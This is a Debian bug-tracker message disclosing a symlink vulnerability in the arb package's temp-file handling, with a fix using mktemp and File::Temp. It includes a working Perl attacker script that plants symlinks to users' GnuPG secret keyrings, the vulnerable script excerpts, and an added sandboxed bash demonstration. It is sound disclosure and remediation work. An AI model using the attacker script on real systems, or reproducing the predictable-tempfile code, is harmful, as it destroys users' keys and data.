[Debian-med-packaging] Bug#496396: The possibility of attack with the help of symlinks in some Debian packages
Dmitry E. Oboukhov
unera at debian.org
Mon Sep 22 14:56:28 UTC 2008
On 08:36 Mon 22 Sep, Andreas Tille wrote:
> Hi,
> unfortunately I completely missed this bug because I had a "relaxing from
> DebConf" vacation and it must somehow have vanished from my mailbox - so sorry
> for caring so late.
> Now I had a look at Arb packaging and have to admit I do not really
> understand which issue exactly fulfills the symlink attack problem.
> Could you please be a little bit more specific (provide the output of
> the script for arb) to enable us to fix this problem quickly?
> Kind regards and thanks for your QA work
Look at the full report: http://uvw.ru/report.lenny.txt
If an attacker creates the symlink /tmp/arb_fdnaml_${USER}_$$ or
/tmp/arbdsmz.html, then starting the scripts
/usr/lib/arb/SH/arb_fastdnaml or
/usr/lib/arb/SH/dszmconnect.pl will lead to data corruption.
Example attacker script:
#!/usr/bin/perl
# Attacker script: plant symlinks at the predictable names before the victim
# runs the arb scripts, so that their writes land on the link target instead.
use strict;
use warnings;

# dszmconnect.pl always opens /tmp/arbdsmz.html for writing. Perl's symlink
# takes (OLDFILE, NEWFILE): the target first, then the link to create.
symlink '/path/to/file', '/tmp/arbdsmz.html';

# arb_fastdnaml uses /tmp/arb_fdnaml_${USER}_$$; $$ is just a PID, so plant
# one link per user for a range of PIDs, each pointing at that user's secret key.
open my $pw, '<', '/etc/passwd' or die "cannot read /etc/passwd: $!";
while (my $line = <$pw>) {
    chomp $line;
    my ($name, $home) = (split /:/, $line)[0, 5];
    next unless defined $home;
    symlink "$home/.gnupg/secring.gpg", "/tmp/arb_fdnaml_${name}_$_"
        for ($$ .. $$ + 1_000_000);
}
close $pw;
Use mktemp(1) (with the -t option) to create temp files in shell scripts.
Use the File::Temp module to create temp files in Perl scripts.
Excerpt from the report:
Package: arb-common
Version: 0.0.20071207.1-4
Filename: pool/non-free/a/arb/arb-common_0.0.20071207.1-4_all.deb
Found error in /usr/lib/arb/SH/arb_fastdnaml:
$ grep -A5 -B5 /tmp/ /usr/lib/arb/SH/arb_fastdnaml
#!/bin/sh
tmp=/tmp/arb_fdnaml_${USER}_$$
mv infile $tmp
nice -19 $1 < $tmp &
sig=$!
/bin/echo "$sig $$ \c" >>/tmp/arb_pids_${USER}_${ARB_PID}
wait
# echo $tmp not deleted for debugging purposes
rm -f $tmp
rm -f checkpoint.$sig
mv treefile.$sig treefile
Found error in /usr/lib/arb/SH/dszmconnect.pl:
$ grep -A5 -B5 /tmp/ /usr/lib/arb/SH/dszmconnect.pl
</body>
</html>";
open (OUTPUT , "> /tmp/arbdsmz.html") or die "cannot open input file /tmp/arbdsmz.html";
if (scalar(@ARGV) == 0)
{print OUTPUT $errordocument;
die("no search items given ! Give at least one item!");}
##print length(@ARGV)."\n";
--
my $selection_content = 'VAR_DATABASE=bact&VAR_HITS=25&VAR_DSMZITEM='."$item1".'&VAR_DSMZITEM2='."$item2".'&B1=Search';
$req_selection->content($selection_content);
# Pass request to the user agent and get a response back
my $res_selection = $ua_selection -> request($req_selection, '/tmp/arbdsmz.htm');
# Check the outcome of the response
if ($res_selection->is_success) {print $res_selection->content;}
else {die "Bad luck this time, request failed\n";};
open (INPUT , "< /tmp/arbdsmz.htm") or die "cannot open input file /tmp/arbdsmz.htm";
my $htmlcontent;
{
local $/;
--
$htmlcontent =~ s{HREF="}{HREF="http://www.dsmz.de}igm;
$htmlcontent =~ s{HREF=[^"]}{HREF=http://www.dsmz.de/}igm; ##"
print OUTPUT $htmlcontent ;
#exec ('netscape', '/tmp/arbdsmz.html');
print "file:///tmp/arbdsmz.html";
##print "$htmlcontent\n";
--
. ''`. Dmitry E. Oboukhov
: :' : unera at debian.org
`. `~' GPGKey: 1024D / F8E26537 2006-11-21
`- 1B23 D4F8 8EC0 D902 0555 E438 AB8C 00CF F8E2 6537
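The following is an added demonstration written for this page; it is not code from the bug report, from the attacker script above, or from the arb package. It reproduces, inside a private sandbox used as TMPDIR, the pattern that makes the fixed names used by arb_fastdnaml (/tmp/arb_fdnaml_${USER}_$$) and dszmconnect.pl (/tmp/arbdsmz.html) exploitable, and shows why the mktemp -t fix recommended above closes the hole. The victim file, the PID value 4242 and all function names are constructed for the example; the attack step is the same as in the attacker script (pre-create a symlink at the name the script will open for writing).

```bash
#!/bin/bash
# Added demonstration: predictable temp-file name vs. mktemp -t.
# Everything happens inside a private sandbox directory used as TMPDIR, so
# the real /tmp and the real ~/.gnupg are never touched.
set -u

SANDBOX=$(mktemp -d)
trap 'rm -rf "$SANDBOX"' EXIT
export TMPDIR="$SANDBOX"           # GNU mktemp -t places files under $TMPDIR
VICTIM="$SANDBOX/victim_secret"    # constructed stand-in for ~/.gnupg/secring.gpg

reset_victim() { printf 'SECRET KEY MATERIAL\n' > "$VICTIM"; }

# Vulnerable shape (as in arb_fastdnaml and dszmconnect.pl): the name depends
# only on guessable values, and ">" follows whatever symlink already sits there.
vulnerable_write() {
  local pid="$1"                                   # plays the role of $$
  local tmp="$TMPDIR/arb_fdnaml_${USER:-user}_${pid}"
  echo "scratch data" > "$tmp"
  echo "$tmp"
}

# Fixed shape: mktemp creates the file itself with O_CREAT|O_EXCL at a name
# containing random characters. A planted symlink cannot sit at that name,
# and O_EXCL refuses an existing path (symlink included) instead of following it.
fixed_write() {
  local tmp
  tmp=$(mktemp -t arb_fdnaml.XXXXXX) || return 1
  echo "scratch data" > "$tmp"
  echo "$tmp"
}

# Attacker step: guess the PID and plant a symlink at the name the victim will use.
attacker_plant() {
  ln -sf "$VICTIM" "$TMPDIR/arb_fdnaml_${USER:-user}_$1"
}

# Succeeds only while the victim file still holds its original contents.
victim_intact() { grep -q 'SECRET KEY MATERIAL' "$VICTIM"; }

# Each run_* prints "corrupted" or "intact" for the victim file.
run_vulnerable() {
  reset_victim
  attacker_plant 4242
  vulnerable_write 4242 >/dev/null
  if victim_intact; then echo intact; else echo corrupted; fi
}

run_fixed() {
  reset_victim
  attacker_plant 4242               # the planted link is simply never opened
  fixed_write >/dev/null
  if victim_intact; then echo intact; else echo corrupted; fi
}

echo "predictable name: $(run_vulnerable)"
echo "mktemp -t:        $(run_fixed)"
```

Running the script prints "corrupted" for the predictable name and "intact" for the mktemp variant. Two caveats a maintainer applying the fix should know: GNU coreutils marks mktemp -t as deprecated in favour of `mktemp --tmpdir TEMPLATE`, which behaves the same way here, and the Perl side has the same property through File::Temp's tempfile(), which also opens its file with O_EXCL; a plain `open(OUTPUT, "> /tmp/fixed-name")` never does.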